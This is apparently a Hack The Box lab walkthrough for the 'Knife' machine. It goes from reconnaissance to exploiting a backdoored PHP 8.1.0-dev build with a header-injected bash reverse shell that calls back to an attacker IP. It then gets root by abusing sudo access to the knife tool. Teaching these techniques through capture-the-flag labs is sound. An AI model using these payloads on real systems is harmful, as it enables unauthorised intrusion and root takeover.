HTB Walkthrough: Knife
Overview
Knife is a relatively easy Linux box on Hack The Box. It features a vulnerable development build of PHP (PHP/8.1.0-dev) that exposes a backdoor. By exploiting this, we gain a reverse shell as user james. Privilege escalation is achieved via sudo access to /usr/bin/knife, a tool that allows arbitrary command execution as root.
Phase 1: Initial Reconnaissance
1. Nmap Scan
sudo nmap -A 10.129.37.146
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Analysis:
- Port 22: OpenSSH 8.2p1 — noted, but not the focus.
- Port 80: Apache hosting a site called Emergent Medical Idea — main attack surface.
2. Web Directory Bruteforce
gobuster dir -u http://10.129.37.146 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
/server-status (Status: 403)
Analysis:
Nothing useful found. /server-status is forbidden (403).
3. Try SSH Login
sudo ssh 10.129.37.146
root@10.129.37.146's password:
Permission denied
Analysis: As expected, password-based root login is blocked.
4. Identify PHP Version from Headers
Using browser dev tools or:
curl -I http://10.129.37.146/
X-Powered-By: PHP/8.1.0-dev
Analysis: This version is known to contain a backdoor in development builds. Critical lead.
5. Search for Exploits
searchsploit php 8.1.0
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution | php/webapps/49933.py
Analysis: Perfect match. We'll use this script to get RCE.
Phase 2: Gaining Initial Shell (User: james)
1. Copy the Exploit Script
searchsploit -m 49933.py
ls
49933.py knife.txt
2. Prepare Your Firewall (UFW)
sudo ufw status numbered
sudo ufw delete 3
sudo ufw delete 2
sudo ufw allow 9001/tcp
sudo ufw status verbose
9001/tcp ALLOW IN Anywhere
3. Set Up Netcat Listener
nc -lvnp 9001
listening on [any] 9001 ...
4. Send Malicious curl Request
curl -v -H "User-Agentt: zerodiumsystem('bash -c \"bash -i >& /dev/tcp/10.10.14.90/9001 0>&1\"');" http://10.129.37.146/
Analysis: Request sent — check your listener.
5. Catch the Shell
nc -lvnp 9001
connect to [10.10.14.90] from (UNKNOWN) [10.129.37.146]
bash: no job control in this shell
james@knife:/$ whoami
james
Success! We are james.
Phase 3: Stabilizing the Shell
1. Spawn a PTY
python3 -c 'import pty; pty.spawn("bash")'
2. Background Shell
Press Ctrl+Z then:
stty raw -echo; fg
3. Confirm Stable Shell
james@knife:/$ whoami
james
4. Retrieve User Flag
cd /home/james
cat user.txt
User flag acquired.
Phase 4: Privilege Escalation to Root
1. Check sudo Permissions
sudo -l
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
Analysis:
Perfect. We can run knife as root without a password.
2. Exploit Knife
sudo knife exec -E "exec '/bin/bash'"
root@knife:/usr/bin# whoami
root
3. Retrieve Root Flag
cd /root
cat root.txt